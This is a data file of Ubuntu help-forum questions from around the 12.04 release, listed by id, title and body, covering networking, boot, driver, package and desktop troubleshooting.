191595	why can not change the file /proc/sys/net/ipv4/ip_forward ?	$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward bash : /proc/sys/net/ipv4/ip_forward : permission denied then i try to get write privilege , also failed . $ sudo chmod a+wx /proc/sys/net/ipv4/ip_forward chmod : changing permissions of `/proc/sys/net/ipv4/ip_forward ' : operation not permitted what is wrong ?
191600	recent documents click launches nautilus rather than file	i have ubuntu 12.04 installed , and recently , i 've noticed that whenever i click on a 'recent document ' from either the `` recent documents '' list in my cairo dock or from my journalling extension in gnome shell , the directory the file is in , is opened in nautilus rather than the actual file . i have not been able to find a solution online . how do i fix this ?
191604	how do i get a tp-link wn723n wireless usb adapter working ?	i am having trouble using a tp-link wn723n wireless usb adapter on my computer which is running ubuntu 12.04 . when i plug the adapter in , the computer automatically picks up a signal from my wireless router but only connects to the internet for a short amount of time before losing the connection . i have searched for additional drivers and have tried running the .exe installation file on the wine drive with no such luck ... am very new to ubuntu would love some help ! thanks : - )
191608	error in mounting hdd	i am getting the following error whenever i mount my external hdd . it was working before and then i opted for safely removing the drive . now its giving me following error error mounting : mount exited with exit code 13 : ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 4096 usa_ofs : 8850 usa_count : 65535 : invalid argument actual vcn ( 0x800006009000000 ) of index buffer is different from expected vcn ( 0x0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
191611	what is the use of /usr/include directory ?	i 'm very new to ubuntu . i 'm looking at the directory /usr/include it contains lot of header files . i know they have specified certain constants and other information that are used in ubuntu . i 'm confused with the use of it . one of the directory inside is linux/byteorder . which has two files : big_endian.h little_endian.h i wonder why two files are needed ? my machine will be either big endian or little endian right ? did n't ubuntu while installation did n't pick my system byte order ? does /usr/include is just same for all machines ? what is the exact use of it ? thanks in advance .
191616	how to share a single session between more than one user at the same time on ubuntu 12.04	is it possible to share the same session for more than one user at the same time ? ! if yes how to do that ?
191621	managing a large collection of pdf files	i have a large collection of pdf files and am looking forward to an application that : is easy to install ( available in repositories ) is portable ( migration to other computer running linux or windows should be easy ) allows annotating and tagging/ categorizing the pdfs allows searching the text of pdfs , metadata , annotations , tags , etc . allows batch import of pdfs also allows importing pdfs without requiring to copy the physical files is preferably open-source allows backing up of library on-line any suggestions ? please mention if your suggestion does not have any features mentioned above . thanks !
191623	mobile broadband internet connection established but unable to browse and download	i am using ubuntu 11.04 and mobile gsm universal modem for internet connection in my acer netbook ( without cdrom ) . the connection is established but i am unable to browse the internet and download updates . can any one help ? it is working in my ubuntu 10.10 .
191624	unable to install ubuntu using wubi	i am new to open-source software but i 'm very much interested in trying it out and hopefully i can start using ubuntu soon . i downloaded wubi.exe first and then i used it to install ubuntu 12.04-lts desktop . it said i had to wait for 6 hrs to finish installation . i did wait patiently ... but after an hour or so , an error message popped up and said the installation had to be stopped . this is the exact message i got : ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' ) it also asked me to check my computer 's log files for more information but i do not know how to access the log files . i 'll be grateful for any help with regard to this installation .
191628	how do i get a different type of scrollbars in 12.04 ?	by default 12.04 uses overlay scroll bars that are too difficult to click and make it harder to see my relative position , and every method i 've found so far of disabling them makes them broken in a different way . when i was using 11.10 this was n't a problem because i could still change the gtk theme . in 12.04 , the appearance settings only contain a few stock themes , and other than the special purpose contrast ones they all have the overlay scroll bars . if i aptitude search gtk3 | grep theme i get no results so there appears to be no packaged alternative either . most suggestions i 've seen for disabling the overlay scroll bars involve uninstalling packages or editing files as root . i want to disable them just for the current user , not for everyone on the whole box ; as should be the case for any theme/display setting . there is a gsettings command that temporarily disables the overlay scrollbars just for the current user , but this has two problems of its own : the setting does n't stick after log off . because who would want to save settings ? the scroll bars put in place have no contrast . they have a black scroller on a black background and are completely unusable . in short what i 'd like to know is how to disable overlay scroll bars such that : my preference is user specific . my preference is actually saved . the scroller can actually be seen against the background without having to use a special high contrast theme that makes my whole desktop look like a negative photo from tron .
191642	should i create separate users for glassfish , mysql or not ?	i recently installed ubuntu server and now i am reading about it . i am going to install software and i see many tutorials create a own user for each program and a group . i am going to install glassfish , mysql etc and i wonder if these should have their own users such as glassfish user , mysql user and so on ? or is it sufficient/better to just create a group and add my own nonroot account to it ?
191647	kvm switch and screen resolution problem	i use 12.04 . till today i use it with an acer trravelmate4070 and an lg screen in order to expand my desktop . works great . till today that i decided to connect my lg screen to a kvm switch in order to share the big screen with an other pc when i need it . in the kvm switch the resolution is lower and i can not manually change it . i read many solutions about making an .conf file but since i am new to ubuntu i am afraid . moreover i realized that these articles talk for the same problem but not as an extension screen but as a main screen . any idea how to correctly configure this file ? these are the links that i consulted : http : //robert.penz.name/219/workaround-for-the-ubuntu-problem-with-kvm-switches/ where is the x.org config file ? how do i configure x there ?
191650	how to know which standard does my wi-fi connection using currently	my laptop has capabilities of 802.11n connection . with my previous router i could connect with more than 54mb connection . now i have d-link router and for some reason the maximum connection speed is 54mb , which implying that the connection has established with 802.11g . how can i check which standard ( g or n ) has been established ? is there any command that get that information ? ( nm-applet does not give any information about that at the connection information window ) .
191651	ca n't shutdown when logged in with an administrator account	while shutting down ubuntu 11.10 it returns to the users menu , and remains there . the problem is only when i am using an administrator account . i have to go back to a guest account to completely shut down the computer . i am using a dell inspiron mini 1018 .
191653	deja dup backup , change use of /tmp to another folder/location	as the title suggests , i 'd like to force deja dup to use a folder other than /tmp . my backups fail due to size size restrictions , see bug : https : //bugs.launchpad.net/deja-dup/+bug/1033552 any help will be greatly appreciated . thanks in advance .
191654	why are there infinitely many x11 subdirectories in /usr/bin/x11 ?	why does the /usr/bin/x11 folder hold another x11 folder and when you open that x11 you get another x11 and then another and another ? i did it about 6 times and got frustrated so i have no idea how deep this goes but what is the purpose ( or is it a glich ? ) ? is this eating disk space more than it should ? ( i was going to delete one or more but thought i better ask first ) i can see no reason why this should be happening at all .
191667	backup windows files using ubuntu - unable to find windows partition	i am using a dell laptop with windows 7 , all of a sudden the hdd is not recognized by win7 . i wanted to backup the data in windows , so i made a ubuntu 12.04.1 live cd , and booted from it . i am using ubuntu without installing it in my laptop . my problem is that i donât see the windows partitions in ubuntu 12.04.1 , because of which i am unable to backup the data . any suggestion in this regard would be very helpful . ps : i checked the smart status of the hdd it says 2 bad sectors , when i attempted an extended self-test , i get a read failed message , though the short test goes through fine . thank you , siva
191669	how to restore the default repositories in 12.04 ?	my repositories are screwed . i need a fresh copy because my old one has a lot of problems . i 've already tried http : //repogen.simplylinux.ch/ but i do n't know what to select and the list it generated does n't allow me to upgrade . so please give me the original repositories so that i can replace this one . i am from india .
191670	can not restart dnsmasq due to `` configuration syntax check [ fail ] ''	i restart dnsmasq and get $ sudo /etc/init.d/dnsmasq restart * restarting dns forwarder and dhcp server configuration syntax check [ fail ] from where and how can i troubleshooting ?
191671	share folders between windows and ubuntu in virtualbox	i use virtualbox . my host os is ubuntu and the guest one is windows xp . i want to share a folder between these two os . but i do n't know how . i 've added the folder on 'devices- > shared folders ' window but i do n't know how to access it from windows . would you help me ? thank you .
191686	grub menu not waiting despite of grub_timeout=10	i have ubuntu 12.04 installed along side of windows 7 . the grub menu does n't seem obey grub_timeout=10 , i see the grub menu there for a split second and it immediately defaults to the first option . grub menu worked fine when i first installed ubuntu . i am not able to pinpoint what exactly broke it ( maybe some update ? ) . i did resize my ubuntu partition using gparted but am not sure if that is what caused it . here are my settings from etc/default/grub grub_default=0 # grub_hidden_timeout=0 # grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' how do i fix this ? edit : as suggested by 'kamil ' this is what i have tried so far with no luck - 1 ) hold the shift key while booting 2 ) sudo gedit /etc/default/grub edit grub_timeout to `grub_timeout=10` sudo update-grub 3 ) sudo gedit /etc/default/grub edit grub_timeout to `grub_timeout=10` sudo update-grub2 4 ) at the end of your /etc/grub.d/00_header file , comment out the if condition except for the regular set timeout line like this : # if [ \ $ { recordfail } = 1 ] ; then # set timeout=-1 # else set timeout= $ { grub_timeout } # fi then sudo update-grub and sudo update-grub2 5 ) install boot repair sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair boot-repair boot-repair output - boot successfully repaired . ... the boot files of [ the os now in use - ubuntu 12.04.1 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) http : //paste.ubuntu.com/1220468/ - here is the full boot-repair data could grub files not being at the start of the disk create such issues ?
191693	remove kubuntu-desktop from ubuntu 12.04	so , i thought i managed to remove kde completely , but apparently that did not work at all , because every kde application is back , including the kde splash screen . i ran sudo apt-get autoremove -- purge kubuntu-desktop then i ran sudo apt-get install -- reinstall ubuntu-desktop then i ran sudo sudo update-alternatives -- config default.plymouth then i rebooted and everything seemed to be the original ubuntu-desktop ( without the kde splash screen and other kde applications ) . but now , one week later i still boot to ubuntu-desktop , but like i said , the kde splash screen and applications are all back . how should i remove kubuntu-desktop ?
191696	what 's the difference between x-www-browser and gnome-www-browser ?	what 's the difference between x-www-browser and gnome-www-browser ? i came across it here : setting the default browser when update-alternatives fails .
191698	suspended mode is not working correctly on ubuntu 12.04 lts	after i did get my pc into the suspended mode , i ca n't get the pc on again . in windows 7 there 's no problem at all . does it take a very long time to get pc to turn on again from suspended mode in ubuntu ? because of this problem i did restart the pc at every suspended mode was activated . please give me some help on this
191699	which firefox plugin should i choose for quicktime format ?	firefox asked me to install missing plugin . and presented with four choices what are the differences between these options ? which one do you recommend ?
191701	program exits when building in mingw studio in ubuntu	is anyone here who uses mingw developer studio in ubuntu ? i found this arhive : http : //www.iit.upcomillas.es/libroc/mingw-devstudio_linux-2.06.tar.gz i launch the program and everything works well till i try to build a project when the program exits . the paths to compilers and debugger are /usr/bin/g++ , /usr/bin/gcc and /usr/bin/gdb . after the program exits in terminal the following error appears : ( mingwstudio:8804 ) : gtk-critical ** : ia__gtk_container_remove : assertion `gtk_is_toolbar ( container ) || widget- > parent == gtk_widget ( container ) ' failed segmentation fault ( core dumped ) thank you ,
191703	mythtv lost recordings - `` no recordings available '' and no recording rules either	i have a c.6 year old mythtv database . i recently upgraded from ubuntu 10.04 to 12.04 . this brought a mythtv upgrade from 0.24 to 0.25 , which went well . today , all my recordings have disappeared . they still exist in the /var/lib/mythtv/recordings folder , and the 'm ' key in the watch recordings page says that there are 201 recordings available somewhere , but they will not display . see screenshot : ( implicit thanks to whomever upvoted this , giving me sufficient reputation to upload images ) changing the filter does not remedy the fact that there is nothing shown in the lists . my upcoming recordings screen says that there are no rules set , but my list of previously recorded shows is still there , and has an entry from as recently as 3am today . mythbackend -- printsched gives the following : user @ box : ~ $ mythbackend -- printsched 2012-09-22 12:59:20.537008 c mythbackend version : fixes/0.25 [ v0.25.2-15-g46cab93 ] www.mythtv.org 2012-09-22 12:59:20.537043 c qt version : compile : 4.8.1 , runtime : 4.8.1 2012-09-22 12:59:20.537048 n enabled verbose msgs : general 2012-09-22 12:59:20.537076 n setting log level to log_info 2012-09-22 12:59:20.537142 i added logging to the console 2012-09-22 12:59:20.537152 i added database logging to table logging 2012-09-22 12:59:20.537279 n setting up sighup handler 2012-09-22 12:59:20.537373 n using runtime prefix = /usr 2012-09-22 12:59:20.537394 n using configuration directory = /home/user/.mythtv 2012-09-22 12:59:20.537999 i assumed character encoding : en_gb.utf-8 2012-09-22 12:59:20.538599 n empty localhostname . 2012-09-22 12:59:20.538610 i using localhost value of box 2012-09-22 12:59:20.538792 i testing network connectivity to '192.168.1.2' 2012-09-22 12:59:20.539420 i starting process manager 2012-09-22 12:59:20.541412 i starting io manager ( read ) 2012-09-22 12:59:20.541715 i starting io manager ( write ) 2012-09-22 12:59:20.541836 i starting process signal handler 2012-09-22 12:59:20.684497 n setting qt default locale to en_gb 2012-09-22 12:59:20.684694 i current locale en_gb 2012-09-22 12:59:20.684813 n reading locale defaults from /usr/share/mythtv//locales/en_gb.xml 2012-09-22 12:59:20.697623 i new static db connectiondatadirectcon 2012-09-22 12:59:20.704769 i mythcorecontext : connecting to backend server : 192.168.1.2:6543 ( try 1 of 1 ) calculating schedule from database . inputs , card ids , and conflict info may be invalid if you have multiple tuners . 2012-09-22 12:59:27.710538 e mythsocket ( 21dfcd0:14 ) : readstringlist : error , timed out after 7000 ms. 2012-09-22 12:59:27.710592 c protocol version check failure . the response to myth_proto_version was empty . this happens when the backend is too busy to respond , or has deadlocked in due to bugs or hardware failure . things i have tried so far : restart the backend restart the frontend run mythtv-setup and check database passwords and ip addresses change the frontend setting for backend ip from localhost to 192.168.1.2 ( the backend/frontend 's ip ) run optimize_mythdb.pl other suggestions appreciated .
191707	using the auto-hide launcher	in addition to the sensitivity problem , there is another annoying problem which i hope may be fixed in 12.10 . it used to be that with the auto-hide on , with no program covering the launcher space , the launchers would be visible . only when some program covered up this space to gain additional real estate , would they actually disappear . in particular , when no program was running , they would be visible . i had hoped this would be fixed in 12.04 but so far it continues to be broken . has anyone seen if it is maybe fixed in 12.10 ?
191709	how to run a program as a service ( silent ) ?	i have a python based server which i start from the terminal . this particular instance of the terminal then gives control to the program , and the program uses it as a kind of logging window , until its closed . is this normal , or should i somehow try to start the program some other way in which it will simply show as an active process ? if i close the terminal from which i started the program , the program dies with it . thank you
191710	how to carry my home ubuntu desktop in pendrive	i have ubuntu 12.04 installed in my internal hdd . is it possible to carry my desktop in my pendrive and use in my office computer and synchronize with my computer when i am back at home .
191712	choppy and/or extremely fast video playback	tried ubuntu , and now mint , had the same issue on both and asked questions on both and did n't get an answer . i thought it might be a flash problem , but i 'm not convinced of that . when i play a video , it often is choppy or `` skips '' for a couple of frames . sometimes the audio and video are then not lined up . sometimes the video inexplicably starts playing very fast , as if in fast forward . i 've also had similar issues when streaming just audio , not video . when i stream a song , for example , it might also skip and/or go into fast forward mode . could n't find an answer to this anywhere . any thoughts ? please help ! linux mint 13 maya 64 bit intel 2500k ( using on-board graphics , no separate video card ) asus p8 z68 vlx mobo
191714	wan na stop syncing photos from my iphone and recoup the ubuntu one space that was previously used for this	i used to sync all my iphone photos via wifi to ubuntu one . i just wan na stop syncing photos from my iphone now and esnure that all the space that was previously used for this on ubuntu one is recuped and made available for other files
191717	how to install linux mint like menu/gnomenu in ubuntu ?	how to get the linux mint menu or gnomenu / or something like it and install it through ppas i do n't want to use the tar.gz or .deb files to install it please help me ( ubuntu 12.04 ) .
191728	12.04 : 2 defined users but one with mute sound at login	ubuntu 12.04 64 bits gnome-shell 3.4.1 i have defined 2 users : one with administration rights and another standard . with the user with admin rights there is n't problem but when the other user enters in his gnome session it has the sound muted : but the gnome-alsa-mixer shows all normal : if he move the volume slider the sound is unmuted . what could be the problem ?
191732	sync pictures folder on windows partition	the pictures folder in my home folder is actually a link to the pictures folder in my windows installation . when i try and sync this folder i get a message saying the folder is not valid . i am however able to sync individual folders within the pictures folder , which seems strange . is there any way i can sync the whole folder ?
191736	wireless n in samsung series 9 np900x3a ( intel ultimate-n 6300 )	after install a fresh ubuntu lts 12.04 ( precise pangolin ) in my samsung series 9 np900x3a the wireless network become super unstable . after boot i can only connect for a few seconds and traffic stops to flow but the wireless stays connected . i believe my driver is intel ultimate-n 6300 , and my router is thomson tg784n .
191738	how to control banshee playback speed ?	is there a way to control playback speed in banshee ? i want to play some videos and pod-casts faster or some video-tutorials slower - just the way it works in vlc ( without changing the pitch ) but ca n't find build-in function or plugin . the reason behind this question is amazing banshee 's library , therefore alternative answer would include suggestions for a media player capable of : watching assigned library paths ( preferably separate for audiobooks , videos , music , pod-casts ) , keeping play-counts and ratings inside each media file as a standard consistent id3v1 or id3v2 ( or at least calling a user defined script after each database change ) , changing the playback speed without affecting the pitch .
191741	can i install a customized image of ubuntu with wubi ?	i have a customized image of ubuntu which i want to install with wubi , there are any procedure to install it without a standard installation or any vm ?
191745	d : drive missing in windows 7 after installing ubuntu ?	i have installed ubuntu 12.04 on my d : drive , alongside by windows 7 installation on my c : drive . however , now when i boot into windows 7 , my d : drive is missing . how can i get my d : drive to reappear in windows 7 ? when i boot into ubuntu , all drives are visible .
191746	what does the l command do ?	there is a command l available on my machine which appears to do nothing . which l also produces no output . is this a real command , and does it actually do anything ?
191748	unable to switch to integrated gpu , using fglrx , catalyst 12.6 , ubuntu 12.04	recently i installed proprietary drivers from ati , but i am unable to switch to integrated gpu using console sudo amdconfig -- px-igpu sudo restart lightdm i am able to log in , but then system shows only background image and mouse cursor ( which moves , but does not interact ) using catalyst control center system hangs and mouse moves choppy my system configuration : hp 4330s intel i5 2410m ati radeon hd 6490m catalyst 12.6 ubuntu 12.04
191749	how to reduce wubi installed ubuntu drive space ?	i originally gave ubuntu 20 gb of my windows space and realize that it 's a lot more than it needs , especially since i only got it on windows to explore the features . i do n't want to delete ubuntu , i just merely want to reclaim unneeded space from it .
191750	system monitor in console mode	is there a way to start system monitor app , from the console ? ? i am not talking about terminal . i am talking about ctrl + alt + f1 mode
191755	why does ubuntu freeze when i close the laptop ?	if i 'm working on windows 7 and close the laptop , it logs me out , and when i open it again i can log back in . however , if i close the laptop with ubuntu running , the screen goes black and it freezes , why ? i am running the latest version of ubuntu . update problem solved , i got the answer from ubuntu forums , i had to go to the power settings and choose `` do nothing '' when the lid is closed
191758	add wma files via update library to clementine	i want to add wma music files to my clementine play list but , when i say update changed library folders it does not want to add the wma files . all the other music files are updated except the wma .
191765	dependancies not met while instaling digikam 2.9	i 'm trying to install digikam 2.9 from http : //ppa.launchpad.net/philip5/kubuntu-backports/ubuntu here is the message i got : les paquets suivants ont des dépendances non-satisfaites : digikam : depends : libkdecore5 ( > = 4:4.7.0 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libkdeui5 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libkfile4 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libkhtml5 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libkio5 ( > = 4:4.7.0 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libkipi9 ( > = 4:4.8.80 ) mais la version 4:4.8.4d-precise~ppa1 va être installée depends : libknotifyconfig4 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libkparts4 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libnepomuk4 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : libphonon4 ( > = 4:4.2.0 ) mais la version 4:4.7.0really4.6.0-0ubuntu1 va être installée depends : libqt4-dbus ( > = 4:4.5.3 ) mais la version 4:4.8.1-0ubuntu4.2 va être installée depends : libqt4-qt3support ( > = 4:4.5.3 ) mais la version 4:4.8.1-0ubuntu4.2 va être installée depends : libqt4-sql ( > = 4:4.5.3 ) mais la version 4:4.8.1-0ubuntu4.2 va être installée depends : libqt4-xml ( > = 4:4.5.3 ) mais la version 4:4.8.1-0ubuntu4.2 va être installée depends : libqtcore4 ( > = 4:4.8.0 ) mais la version 4:4.8.1-0ubuntu4.2 va être installée depends : libqtgui4 ( > = 4:4.8.0 ) mais la version 4:4.8.1-0ubuntu4.2 va être installée depends : libsolid4 ( > = 4:4.7 ) mais la version 4:4.8.5-0ubuntu0.1 va être installée depends : digikam-data ( = 4:2.9.0-precise~ppa1kde49 ) mais la version 4:2.9.0-precise~pp i already tried running sudo apt-get install -f . this did not help , still get the same error message . also tried the first answer but it does n't fix the problem . i 've done this , removed the packages detected , reboot . but still get exactly the same message about dependencies . can someone help ?
191767	is it possible to recover a secret key from a gpg public key ?	i have lost the gpg keys i use for launchpad and email encryption , along with my entire ~/.gnupg folder . can i recover them using the public key ?
191770	printer setup problem	using ubuntu 12.04 on old used to be xp desktop now dedicated to ubuntu . printer is canon mx320 . had been running it on my other desktop and laptop thru a switch . no problem . want to eliminate the win7 box and use the linux and the canon printer . unable to print anything . any suggestions would be appreciated . i get to localhost:631 , add printer and asks for my username , put it in , then password but it does not recognize it . ? ? just reverts back to the ask username/password box . ok i got through the login but it could not find my printer ( mx320 ) . all it found was similar models as pixma 300 , 330 . thay did not work . it did show up in the print queue but no activity .
191777	custom folder icon in lubuntu 's pcman file manager	i just want to ask , if anyone knows how to change icons of programs , folder etc . in pcman filemanager , nautilus or dolphin can do this , but pcman not . thanks for reply ps : i want to change it separately , not with icon-theme .
191778	how to install fonts fast and easy ?	i need to install more than 100 fonts , so i was wondering if there is an easy way to do this task ? i know you can opening every single one and pressing install font , but installing more then 100 fonts this way will be very hard . in my home directory i have only .fontconfig and i do not have .font and in /usr/share/fonts i can not copy files it tells my some thing about rights is there an easy and fast way to do this task ?
191779	how do i encrypt the / partition but not the whole disk ?	i 'm aware of encrypting home folders , but i want to use luks encryption to encrypt my root partition , but leave room for a /backup partition that is not encrypted . the alternate cd requires encrypting the whole disk . how do i do this ?
191791	chrome install failed on ubuntu 12.04	i have tried sudo apt-get install -f and then sudo apt-get update but i still have the same dependency problems : dpkg : dependency problems prevent configuration of google-chrome-stable : i386 : google-chrome-stable : i386 depends on xdg-utils and idea how to fix it ? btw , when i use sudo apt-get install -f , i got an output : after this operation , 119 mb disk space will be freed . do you want to continue [ y/n ] ? y which seems to remove the files .
191793	lenovo ultrabay battery for thinkpad w520	i have seen many people purchasing that accessory for their lenovo laptops.the problem is that many people are complaining about the fact that even though the oss are able to see the extra battery `` juice '' from the battery bay , after the main battery rans out of energy the computer shuts down.most of the cases , this happens because they have n't set up the lenovo power manager.at least this is what they claim other users in support forums.i was wondering has anyone tested this under ubuntu 12.04 lts.i mean can it recognize/manipulate/use the extra battery energy from the ultrabay or not ?
191794	wanting to install ati driver for duel graphics amd8 with radeon 6470	with 11.10 i used to download the latest ati driver for my duel graphics radeon card problem . with 12.04 the graphics problem is resolved it seems . but the ubuntu driver on my laptop is burning . so i wanted to install the ati driver to see if it would be better . in the old days when the laptop would not run without the ati driver i simply ran recovery mode and it promoted me for my user and password . installing 12.04 i changed my user to user1 . but now in 12.04 it doesnt stop at the prompt for name and password but takes me to a window where i can drop to root etc . can someone tell me how to input the command i tried terminal but it doesnt recognise my command cd /home/user1/downloads should i do it in recovery using root if so what are the commands please or better still tell me the fix to keep my graphics cool if i keep ubuntu driver . or what you recommend ? thanks
191795	how to trace reason for system crash after reboot ?	i was running firefox , two tabs one with youtube and my system froze and required hard reboot . is there a way to find the cause of the crash after a system reboot ? does ubuntu auto log crashes ?
191798	terminal stuck in mirrored display mode ( ctrl-alt-f1 )	i have a dual monitor setup . lately it 's been giving me grief ; booting with the wrong monitor as primary sometimes , `` out of range '' problems on the primary display , etc . now for the latest problem ( the one i 'm really trying to resolve ) . today i noticed that when i `` ctrl-alt-f1 '' to get a raw terminal , the terminal is in mirrored display mode . i see it both on my primary display and on my secondary display . preferable would be to only see it on the primary display , of course . within the `` system settings | displays '' i 've actually got the secondary display disabled . any idea how to fix this ? ubuntu 12.04lts . driver details : $ lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
191802	how to fix the boot set up ?	i got two oses in my pc , ubuntu and windows 7 . until yesterday windows 7 was on top of my dual-boot menu list , but i wanted to change it , so i went inside windows configurations and put ubuntu first , but i also set the time to 0 because i thought i could access windows through grub . but what happens is that after i upgraded ubuntu to 11.10 , that screen with boot options do n't show windows 7 anymore . i went online searching for a solution to my problem , most of them told me to configure some grub options and others to use programs to do it . i 've done them all and still ca n't access windows 7 . just in case my problem is not clear yet , this is how was my boot order before i messed it all up : windows 7 ubuntu with a time of 10 secs to choose between both . this is how i wanted it to be : ubuntu windows 7 with 0 time to choose , but , inside ubuntu i could access windows through that grub screen . but this is what happens : ubuntu windows 7 0 time , so it do n't let me choose anything and jumps inside ubuntu then inside ubuntu grub does n't show up anymore ( black screen ) and it starts ubuntu normally . i tried to fix this many times from different ways inside ubuntu but nothing worked , also when i try do something and then upgrade my grub with sudo upgrade-grub it shows this message : generating grub.cfg ... found windows 7 ( loader ) on /dev/sda1 skipping windows 7 ( loader ) on wubi system found linux image : /boot/vmlinuz-3.0.0-12-generic found initrd image : /boot/initrd.img-3.0.0-12-generic found linux image : /boot/vmlinuz-2.6.38-12-generic found initrd image : /boot/initrd.img-2.6.38-12-generic done thats why in the title i said it could probably be my wubi messing all up . anyone heave a solution for this ? do you need more information ? i have a netbook so i can not use the windows repair cd .
191806	how do i get boinc 's icon to show up in the system tray ?	i installed berkeley 's boinc software in windows and i loved it , however i 'm having some problems using it in ubuntu 12.04 : one of then is that the software does n't appear in the systray , only in the unity dock ( left side ) , wich means that i ca n't see how it 's working by passing the cursor over the icon on the systray like it 's supposed to . over that when boinc is minimized on the unity dock and i close the rest of the windows it automatically maximizes , wich is very annoying i hope this problems can be fixed , because i love to use this software , and knowing it 's open-software it would be a shame it did n't run on ubuntu like it should .
191808	ca n't use hg through a mounted directory	i have a repository on my development server whose directory i have mounted using sshfs . i 've synced up my uid/guid and seem to be able to execute/edit files as usual on said directory , as if i had just ssh'ed in . however , when i run a command like hg status , the process hangs and never returns to me the expected result . is there any reason why mounting a directory like this would be much different than just sshing in and calling the same command ? for reference , the mounted filesystem is nfs , and the command i run is 'sshfs me @ myserver : /home/me/repo /home/me/mnt/repo' thanks in advance .
191809	how can i configure boinc to start at startup ?	i ca n't get boinc to start with the rest of the startup applications and the software itself does n't have that option , i 've been reading about it on berkeley 's forum but i ca n't get the answer , it appears the 12.04 version has a lot of errors that the previous version did n't . is there a way to do it ?
191811	how exactly does unity handle desktop files ?	i searched for a .desktop file for supermeatboy since it was n't in /usr/share/applications/ . so i used the terminal : chocobai @ desktoppc : / $ locate *.desktop | grep -ir `` meat '' /home/chocobai/.gnome/apps/supermeatboy_com-supermeatboy_1.desktop /home/chocobai/.local/share/applications/supermeatboy_com-supermeatboy_1.desktop /home/chocobai/.supermeatboygame/.mojosetup/supermeatboy_com-supermeatboy_1.desktop i guess the installer did this because of backward compatibility . how does unity handle these files ? specifically , which folders does it watch ? why do n't they need to be executeable ? why is n't there only one folder like /usr/share/applications/ to hold .desktop files ? i found many answers to similar questions , sounding like '' it should be in /usr/share/applications , but if it 's not there , just type in the terminal ... '' and so on . but that never answered the question of how unity handles ( finds , searches ) these files . thanks in advance .
191812	nvidia dual monitor configuration unsupported after rebooting	i 'm running ubuntu 12.04 with the ubuntu supplied nvidia drivers for my geforce 9800 gt . when i go into nvidia-settings and enable my 2nd monitor and click apply , it turns on and works great . then i save the configuration to the xorg.conf file . however , when i reboot i get a message saying that the configuration is not supported and that i have to run in low graphics mode . any idea what is wrong ?
191816	restore dnsmasq-base . howto ?	i have ubuntu ( 12.04 64bit ) running using vmware player . i accidentally removed dnsmasq-base and therefore also network-manager + network-manager-gnome . how can i re-install these without any internet connection on the guest machine , the host is windows 7 and is connected . i have the ubuntu installation iso file available in my home directory ... if i could add it as repository that would be great . thanks ! // roland
191817	how to reconnect after an interruption during an update ?	my daughter apparently interrupted an update to ubuntu 12.04 turning down the computer and i am now asked to enter a login and a password and i have no clue what to enter can you help ?
191818	how can i determine which private ppas are slowing down updates ?	i 've several ppa installed on my system . every time i perform an apt-get update there 's a moment in which the updating process remains stuck in this position ( it lasts almost a minute ) : ign https : //private-ppa.launchpad.net precise/main translationindex ign https : //private-ppa.launchpad.net precise/main translation-it ign https : //private-ppa.launchpad.net precise/main translation-en 100 % [ in lavorazione ] ( i do n't know in english how the last line is , something like `` 100 % [ working ] '' ) i presume this happens because a download of a ppa is slow . ( do you think this might be the reason ? ) if so , i 'd like to remove this ppa from my system . the problem is that during this phase i ca n't distinguish among ppas because all of them show this url : https : //private-ppa.launchpad.net precise/main . is there a way to identify the ppa which is being updated in that particular moment ?
191819	how to change wlan0 's channel	when setting the channel to wlan0 , i get an error : set failed on device wlan0 ; device or resource busy . i tried to shutdown wlan0 by : sudo ifconfig wlan0 down and wlan0 did not appear in the ifconfig result , but i still get the error when i use this command to switch channels : sudo iwconfig wlan0 channal 1 the funniest thing is i just used this method to change channal from 4 to 6 , and now i want to change the channal from 6 to 1 , but i ca n't finish it . did i miss something ?
191821	lan driver for gigabyte g41m combo driver	linux driver not in cd of gigabyte g41m combo mother board . need driver and installation instructions .
191822	what audio enhancers are available ?	i am looking for an audio enhancer which would act for all the sound playing in ubuntu 12.04 lts ( audio/video players , browser ) ..something like dfx for windows ! thanks for your reply .
191823	windows installer for ubuntu desktop 32bit	i want to instal ubuntu with windows installer . the probles is that i can not select to be installed on 32 bit . how can i do that , please ? thanks
191825	mouse hover has delay/select ( lubuntu 12.10	i am not sure when this happened so i have not been able to find out how to change it but if i hover mouse over a file it will delay before the item ( say for example a folder or file ) will go darker . when it goes darker , the item is selected so only a single click will start the program/enter the folder . it seems that hovering is doing what you would expect a single click to do ( but to a delay ) . does anyone know how i can change this setting ? i have looked in openbox and mouse settings and ca n't see anything obvious .
